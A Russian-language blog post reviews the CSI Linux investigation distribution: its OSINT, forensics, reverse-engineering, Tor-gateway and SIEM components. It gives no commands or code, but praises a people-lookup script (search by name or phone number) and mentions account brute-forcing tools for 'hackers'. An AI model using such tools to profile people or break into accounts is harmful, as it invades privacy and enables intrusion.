    <li><strong>Для системы требуется большой объём:</strong> как минимум 50 гб для запуска образа и не менее 8 гб оперативной памяти для полноценного функционирования.</li>
    <li><strong>Вся система разделена на</strong>: CSI Linux Analyst, CSI Linux Gateway и CSI Linux SIEM.</li>
  </ul>
  <hr />
  <p><strong>CSI Linux Analyst</strong> — это основная рабочая станция для расследований, она используется для цифровой криминалистики, содержит инстументы для расследования, сбора, анализа и составления отчётов об инцидентах.</p>
  <p><strong>CSI Linux Gateway</strong> — отправляет весь трафик от CSI Linux Analyst через сеть Tor, чтобы скрыть исходный ip адрес для дополнительной безопасности, а также используется чтобы взаимодействовать с даркнет сервисами и проводить их разведку.</p>
  <p><strong>CSI Linux SIEM</strong> — используется для реагирования на инценденты и обнаружение вторжения, если наша система скомпрометирована, мы можем использовать инструмент SIEM для проверки уязвимости системы.</p>
  <hr />
  <h3 data-align="center">CSI Linux Analyst | Основная рабочая станция</h3>
  <p><strong><em>Начнём с основной системы.</em></strong></p>
  <figure class="m_column">
    <img src="https://teletype.in/files/0e/97/0e97c659-5cfc-4ece-bfbc-b289608141b8.png" width="1024" />
  </figure>
  <p><strong>CSI Linux Analyst</strong> имеют удобное графическое окружение, внизу системы расположена панелька с основными утилитами. Во первых тут 3 браузера: хром, файрфокс и тор браузер.</p>
  <p>За ними следует утилита <strong>OnionShare</strong> — это инструмент для относительно анонимного и безопасного обмена файлами через сеть tor, onion share запускает на локальной системе web сервер, он работает в форме скрытого сервиса tor, делает его доступным для других нужных нам пользователей, которые могут скачать раздаваемые нами файлы.</p>
  <p>Вслед за этой утилитой следует программа <strong>KeePassXC </strong>— это менеджер хранения паролей, где мы можем создавать базу и в ней хранить безопасно пароли от различных сервисов и держать всё в зашифрованном виде.</p>
  <p>Затем мы можем наблюдать <strong>GNU Privacy Assistant</strong> — он представляет собой графический интерфейс для GNUPG, он необходим для генерирования, хранения и работы с различными ключами шифрования.</p>
  <p>Далее идёт <strong>мессенджер qTox </strong>— он нужен для децентрализованной текстовой, голосовой и видео связи на основе ассиметричного шифрования, а также <strong>мессенджер Pidgin</strong> — с помощью него вы можете выстроить конфиденциальное общение по различным непрослушиваемым протоколам.</p>
  <p><strong>Затем начинаются профильные программы нашего дистрибутива.</strong></p>
  <ul>
    <li>Первая из них <strong>Hunchly</strong>, она представляет из себя специализированный инструмент для захвата вебстраниц, предназначена для проведения исследования OSINT, она будет сохранять и каталогизировать веб-страницы, фотографии, файлы, метаданные, иными словами всё, что вы будете использовать в рамках своего расследования, тем самым облегчая вам поиск цифровых доказательств, но и предотвращая их утерю если эти данные доказательства будут удалены из общего доступа.</li>
    <li>Следующий профессиональный инструмент — <strong>Social Media Search Application </strong>—это специальный скрипт, объединяющий в себе инструменты пробива и поиска по нику, имени,фамилии, номера мобильного телефона на предмет упоминания в различных социальных сетях, популярных сервисах и сайтах.</li>
    <li>Если вам знакомы такие инструменты как <strong>Sherlock</strong>, <strong>SpiredFoot</strong> и похожие, то все их вы здесь найдёте. А если вам понадобится информация о сайте или домене, то на выручку вам придёт программа <strong>Domain Interrogation Tool</strong>, в свою очередь тут вы найдёте трек для сбора всех поддоменов нужной цели, хардвёрс, metagootfil для извлечения метаданных публичных документов, которые расположены на исследуемом сайте. Все эти программы присутствуют в данном скрипте.</li>
    <li>Затем у нас следует знаменитое <strong>Maltego</strong>, наверное, самый популярный инструмент для построения и анализа связей между различными объектами расследования, визуализации данных и разведки на основе открытых источников OSINT. Если вам нужно выявить какие-то взаимосвязи между сайтами, компаниями, ip адресами, номерами телефонов или ещё какие-либо данными, то Maltego — отличный инструмент в вашем расследовании.</li>
    <li>Далее у нас идут уже инструменты форензики и киберкриминалистики. <strong>Autopsy</strong> — это инструмент с открытым исходным кодом, он используется полицией, военными или корпаративными экспертами для расследования того, что произошло на компьютере, полезно если вам необходимо обнаружить удалённые файлы жёсткого диска, извлечь историю браузера или куки, найти методанные на фото, отсортировать файлы на диске по определённым характеристикам, с этой штукой даже можно восстановить удалённые видео с карт памяти видеокамер и телефонов, это весьма полезно при определённых обстоятельствах.</li>
    <li><strong>Следующий инструмент в моём обзоре прямиком из агенства национальной безопасности США</strong>, это — <strong>Ghidra</strong>. <br />Ghidra — платформа для реверс инженеринга, программное обеспечение разработанное АНБ, оно помогает анализировать вредоносные код и вредоносные программы, может дать понимание потенциальных уязвимостей в сетях и системах. Её возможности включают разборку, сборку, декомпеляцию, создание графиков или сценариев, в общем широкий простор для инженеров обратной разработки.</li>
  </ul>
  <p><strong>В CSI Linux также присутствуют и более повседневные программы:</strong></p>
  <p><strong>CherryTree </strong> — приложения для создания иерархических заметок и пакета программ <strong>LibreOffice</strong> для работы с офисными документами.</p>
  <hr />
  <h3 data-align="center"><strong>CSI Linux Gateway</strong> | Шлюз TOR</h3>
  <p>Мы плавно подошли к кнопкам управления трафика, а именно мы можем перенаправлять весь наш трафик от машины<strong> CSI Analyst</strong> в машину <strong>Gateway CSI</strong>,которая является шлюзом в сеть tor.<br /><strong><em>Cхожая реализация была в системе Whonix. </em></strong>Для этого просто запускаем Gateway, как дополнительную машину, а после активируем, далее поменяется картинка рабочего стола, это сделано для удобства и дабы вы не запутались куда именно течёт ваш трафик, а на выходе мы будем иметь ip адрес tora. Кроме того, что теперь все наши разведывательные действия приобрели плюс к анонимизации, теперь все наши инструменты о которых я рассказывал ранее можно применить и для расследования внутри сети tor, анализа даркнет сайтов и их пользователей. Когда же мы захотим пользоваться обычным клирнетом, то мы можем снова вернуть всё на место, деактивировав скрипт одним нажатием.</p>
  <hr />
  <h3 data-align="center">CSI LINUX SIEM | Мониторинг и проверка уязвимостей</h3>
  <p>Теперь мы подошли к использованию <strong>CSI LINUX SIEM</strong>. Запустив её и <strong>CSI Analyst </strong>вместе, а также активировав специальный скрипт для маршрутизации трафика, мы можем использовать встроенную программу <strong>Kibana</strong>. Она создана для использования и мониторинга, анализа it инфраструктуры, а также alastic search для проверки уязвимости всей системы.</p>
  <p>Помимо всех перечисленных инструментов, CSI Linux также хранит в себе безумно большое количество инструментов для OSINT разведки, конфиденциального общения, скрипты для работы с сетями i2p, freenet, криптокошельки, инструменты для брутфорсинга учётных записей пользователя и для парольных фраз, для доступа к криптоконтейнеру. Далее, тут есть интументы для криминалистической экспертизы, мобильных устройств и ещё множество инструментов безусловно достоенных вашего внимания.</p>
  <p>В конце статьи хотелось бы сказать, <strong>CSI Linux на сегодняшний момент безусловно является одним из лучших дистрибутивов для нетсталкеров, мастеров пробива или хакеров.</strong></p>
  <p>Конечно, он достаточно сложен в освоении, большой по объёму и требователен к железу, однако, это всё же того стоит, а реализация за счёт гипервизора, как вы уже могли заметить, близка к моим личным предпочтениям. Надеюсь, что данная статья побудит вас попробовать этого разведовательного монстра в действии.</p>
  <hr />
  <p><strong>Также выложу для вас ссылки которые помогут разобраться немного с CSI Linux и его утилитами.</strong></p>
  <ul>
    <li>CSI LINUX - <a href="https://vk.com/away.php?to=https%3A%2F%2Fcsilinux.com%2F&post=447357304_1347&cc_key=" target="_blank">https://csilinux.com/</a></li>
    <li>Maltego - <a href="https://vk.com/away.php?to=https%3A%2F%2Fwww.maltego.com%2F&post=447357304_1347&cc_key=" target="_blank">https://www.maltego.com/</a></li>
    <li>Autopsy - <a href="https://vk.com/away.php?to=https%3A%2F%2Fwww.sleuthkit.org%2Fautopsy%2F&post=447357304_1347&cc_key=" target="_blank">https://www.sleuthkit.org/autopsy/</a></li>
    <li>Ghidra - <a href="https://vk.com/away.php?to=https%3A%2F%2Fghidra-sre.org%2F&post=447357304_1347&cc_key=" target="_blank">https://ghidra-sre.org/</a></li>
    <li>qTox - <a href="https://vk.com/away.php?to=https%3A%2F%2Fqtox.github.io%2F&post=447357304_1347&cc_key=" target="_blank">https://qtox.github.io/</a></li>
    <li>Kibana - <a href="https://vk.com/away.php?to=https%3A%2F%2Fwww.elastic.co%2Fkibana&post=447357304_1347&cc_key=" target="_blank">https://www.elastic.co/kibana</a></li>
    <li>OSINTFramework - <a href="https://vk.com/away.php?to=https%3A%2F%2Fosintframework.com%2F&post=447357304_1347&cc_key=" target="_blank">https://osintframework.com/</a></li>
    <li>OSINT-Search - <a href="https://vk.com/away.php?to=https%3A%2F%2Fgithub.com%2Fam0nt31r0%2FOSINT-Search&post=447357304_1347&cc_key=" target="_blank">https://github.com/am0nt31r0/OSINT-Search</a></li>
    <li>Spiderfoot - <a href="https://vk.com/away.php?to=https%3A%2F%2Fwww.spiderfoot.net%2F&post=447357304_1347&cc_key=" target="_blank">https://www.spiderfoot.net/</a></li>
  </ul>
  <p>Это лишь несколько инструментов, само собой там их намного больше.</p>
  <hr />
  <h3><a href="https://t.me/h4ckers_zone" target="_blank">Канал</a></h3>
  <h3><a href="https://t.me/h4ckers_zone_bot" target="_blank">Вспомогательный бот канала</a></h3>
  <h3><a href="https://t.me/chat_zone" target="_blank">Чатик канала</a></h3>

]]></content:encoded></item></channel></rss>